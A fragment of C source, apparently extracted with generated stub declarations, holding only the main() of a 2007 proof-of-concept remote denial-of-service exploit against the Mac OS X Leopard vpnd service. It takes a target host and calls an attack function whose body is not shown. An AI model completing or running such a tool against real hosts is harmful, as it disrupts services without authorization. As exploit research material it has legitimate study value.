
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int EXIT_SUCCESS ;
 int exit (int) ;
 int fprintf (int ,char*,char*) ;
 int printf (char*) ;
 int stderr ;
 int zattack (char*) ;

int
main (int argc, char **argv)
{
  printf ("Apple MACOS X 10.5.0 (leopard) vpnd remote DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <host>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  zattack (argv[1]);

  printf ("+Wh00t!\n");

  return (EXIT_SUCCESS);
}
